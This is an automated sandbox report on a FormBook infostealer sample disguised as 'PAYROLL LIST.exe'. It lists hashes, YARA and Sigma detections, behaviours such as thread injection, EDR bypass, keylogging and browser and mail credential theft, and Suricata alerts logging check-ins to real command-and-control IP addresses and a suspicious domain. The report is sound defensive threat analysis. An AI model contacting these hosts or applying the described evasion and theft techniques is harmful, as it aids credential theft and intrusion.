Edit tour

Windows Analysis Report
PAYROLL LIST.exe

Overview

General Information

Sample name:	PAYROLL LIST.exe
Analysis ID:	1561743
MD5:	e51f8d1fc9fd9b75c5f7bafe9b666c22
SHA1:	5697c6b82bb5fda6cf6ff82d3c3b8249bca8c692
SHA256:	0383269c133cc3a71a10d4c55ba116a11b24a38223703d79522b397d782a72e2
Tags:	exeFormbookuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

PAYROLL LIST.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\PAYROLL LIST.exe" MD5: E51F8D1FC9FD9B75C5F7BAFE9B666C22)

svchost.exe (PID: 3152 cmdline: "C:\Users\user\Desktop\PAYROLL LIST.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

XQNtOWkQlf.exe (PID: 2360 cmdline: "C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

waitfor.exe (PID: 3880 cmdline: "C:\Windows\SysWOW64\waitfor.exe" MD5: E58E152B44F20DD099C5105DE482DF24)

XQNtOWkQlf.exe (PID: 5956 cmdline: "C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 3476 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.4582414489.0000000004690000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4571302194.0000000002740000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2407829653.0000000003290000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4584294088.00000000046E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2407461524.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4581284077.0000000004350000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2408321100.0000000004B50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PAYROLL LIST.exe", CommandLine: "C:\Users\user\Desktop\PAYROLL LIST.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYROLL LIST.exe", ParentImage: C:\Users\user\Desktop\PAYROLL LIST.exe, ParentProcessId: 7084, ParentProcessName: PAYROLL LIST.exe, ProcessCommandLine: "C:\Users\user\Desktop\PAYROLL LIST.exe", ProcessId: 3152, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\PAYROLL LIST.exe", CommandLine: "C:\Users\user\Desktop\PAYROLL LIST.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYROLL LIST.exe", ParentImage: C:\Users\user\Desktop\PAYROLL LIST.exe, ParentProcessId: 7084, ParentProcessName: PAYROLL LIST.exe, ProcessCommandLine: "C:\Users\user\Desktop\PAYROLL LIST.exe", ProcessId: 3152, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T08:28:34.269221+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49790	202.92.5.23	80	TCP
2024-11-24T08:28:59.360886+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49850	13.248.169.48	80	TCP
2024-11-24T08:29:14.380015+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49888	209.74.77.109	80	TCP
2024-11-24T08:29:29.450158+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49927	23.225.160.132	80	TCP
2024-11-24T08:29:44.504947+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49962	46.30.211.38	80	TCP
2024-11-24T08:30:02.028987+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50003	103.224.182.242	80	TCP
2024-11-24T08:30:37.676799+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50007	149.88.81.190	80	TCP
2024-11-24T08:30:53.157101+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50011	101.35.209.183	80	TCP
2024-11-24T08:31:08.890514+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50016	38.47.232.202	80	TCP
2024-11-24T08:31:24.777385+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50020	208.91.197.39	80	TCP
2024-11-24T08:31:40.136142+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50024	43.205.198.29	80	TCP
2024-11-24T08:31:55.588246+0100	2855465	1	A Network Trojan was detected	192.168.2.6	50028	104.21.40.167	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T08:28:51.346122+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49830	13.248.169.48	80	TCP
2024-11-24T08:28:54.094567+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49836	13.248.169.48	80	TCP
2024-11-24T08:28:56.733423+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49843	13.248.169.48	80	TCP
2024-11-24T08:29:06.321809+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49866	209.74.77.109	80	TCP
2024-11-24T08:29:09.039119+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49874	209.74.77.109	80	TCP
2024-11-24T08:29:11.704290+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49881	209.74.77.109	80	TCP
2024-11-24T08:29:21.309500+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49904	23.225.160.132	80	TCP
2024-11-24T08:29:24.137477+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49911	23.225.160.132	80	TCP
2024-11-24T08:29:26.778071+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49920	23.225.160.132	80	TCP
2024-11-24T08:29:36.487361+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49943	46.30.211.38	80	TCP
2024-11-24T08:29:39.145083+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49949	46.30.211.38	80	TCP
2024-11-24T08:29:41.864243+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49955	46.30.211.38	80	TCP
2024-11-24T08:29:53.725965+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49987	103.224.182.242	80	TCP
2024-11-24T08:29:56.621966+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49994	103.224.182.242	80	TCP
2024-11-24T08:29:59.182645+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50000	103.224.182.242	80	TCP
2024-11-24T08:30:09.184810+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50004	149.88.81.190	80	TCP
2024-11-24T08:30:11.872271+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50005	149.88.81.190	80	TCP
2024-11-24T08:30:14.543978+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50006	149.88.81.190	80	TCP
2024-11-24T08:30:45.055638+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50008	101.35.209.183	80	TCP
2024-11-24T08:30:47.683511+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50009	101.35.209.183	80	TCP
2024-11-24T08:30:50.416205+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50010	101.35.209.183	80	TCP
2024-11-24T08:31:00.528569+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50012	38.47.232.202	80	TCP
2024-11-24T08:31:03.338903+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50013	38.47.232.202	80	TCP
2024-11-24T08:31:06.169311+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50015	38.47.232.202	80	TCP
2024-11-24T08:31:16.001908+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50017	208.91.197.39	80	TCP
2024-11-24T08:31:18.678256+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50018	208.91.197.39	80	TCP
2024-11-24T08:31:21.447020+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50019	208.91.197.39	80	TCP
2024-11-24T08:31:32.076608+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50021	43.205.198.29	80	TCP
2024-11-24T08:31:34.744024+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50022	43.205.198.29	80	TCP
2024-11-24T08:31:37.466203+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50023	43.205.198.29	80	TCP
2024-11-24T08:31:47.138016+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50025	104.21.40.167	80	TCP
2024-11-24T08:31:49.810768+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50026	104.21.40.167	80	TCP
2024-11-24T08:31:52.481857+0100	2855464	1	A Network Trojan was detected	192.168.2.6	50027	104.21.40.167	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: PAYROLL LIST.exe	ReversingLabs: Detection: 68%
Source: PAYROLL LIST.exe	Virustotal: Detection: 57%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4582414489.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4571302194.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407829653.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4584294088.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407461524.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4581284077.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2408321100.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: PAYROLL LIST.exe

Joe Sandbox ML: detected

Source: PAYROLL LIST.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: waitfor.pdbGCTL source: svchost.exe, 00000002.00000003.2375440858.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000002.4574454137.0000000001288000.00000004.00000020.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000003.2662841781.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: waitfor.pdb source: svchost.exe, 00000002.00000003.2375440858.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000002.4574454137.0000000001288000.00000004.00000020.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000003.2662841781.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XQNtOWkQlf.exe, 00000004.00000002.4571300074.000000000049E000.00000002.00000001.01000000.00000005.sdmp, XQNtOWkQlf.exe, 00000007.00000000.2474984397.000000000049E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: PAYROLL LIST.exe, 00000000.00000003.2121664519.0000000003340000.00000004.00001000.00020000.00000000.sdmp, PAYROLL LIST.exe, 00000000.00000003.2130814425.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2407866855.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2306328805.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2304045378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2407866855.0000000003300000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2407867623.0000000004591000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4585566705.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2410269610.0000000004747000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4585566705.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PAYROLL LIST.exe, 00000000.00000003.2121664519.0000000003340000.00000004.00001000.00020000.00000000.sdmp, PAYROLL LIST.exe, 00000000.00000003.2130814425.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2407866855.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2306328805.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2304045378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2407866855.0000000003300000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000005.00000003.2407867623.0000000004591000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4585566705.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2410269610.0000000004747000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4585566705.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: waitfor.exe, 00000005.00000002.4573886481.0000000002A75000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4587102048.0000000004F1C000.00000004.10000000.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000002.4585605922.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2702452245.000000001E85C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: waitfor.exe, 00000005.00000002.4573886481.0000000002A75000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4587102048.0000000004F1C000.00000004.10000000.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000002.4585605922.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2702452245.000000001E85C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A66CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A66CA9
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00A660DD
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00A663F9
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A6EB60
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00A6F5FA
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A6F56F FindFirstFileW,FindClose,	0_2_00A6F56F
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A71B2F
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A71C8A
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A71F94
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0275CB90 FindFirstFileW,FindNextFileW,FindClose,	5_2_0275CB90

Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 4x nop then xor eax, eax		5_2_02749F10
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 4x nop then mov ebx, 00000004h		5_2_047E04CE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49790 -> 202.92.5.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49836 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49843 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49850 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49904 -> 23.225.160.132:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49911 -> 23.225.160.132:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49830 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49881 -> 209.74.77.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49949 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49888 -> 209.74.77.109:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49927 -> 23.225.160.132:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49943 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49866 -> 209.74.77.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49874 -> 209.74.77.109:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49920 -> 23.225.160.132:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 101.35.209.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 101.35.209.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 38.47.232.202:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50011 -> 101.35.209.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50003 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49955 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 38.47.232.202:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 101.35.209.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50017 -> 208.91.197.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 104.21.40.167:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 43.205.198.29:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 208.91.197.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 104.21.40.167:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50028 -> 104.21.40.167:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50020 -> 208.91.197.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50024 -> 43.205.198.29:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49962 -> 46.30.211.38:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 208.91.197.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 103.224.182.242:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 104.21.40.167:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50007 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 43.205.198.29:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 38.47.232.202:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50016 -> 38.47.232.202:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 43.205.198.29:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.optimismbank.xyz

Source: Joe Sandbox View	IP Address: 209.74.77.109 209.74.77.109
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
Source: Joe Sandbox View	ASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View	ASN Name: SAIC-ASUS SAIC-ASUS

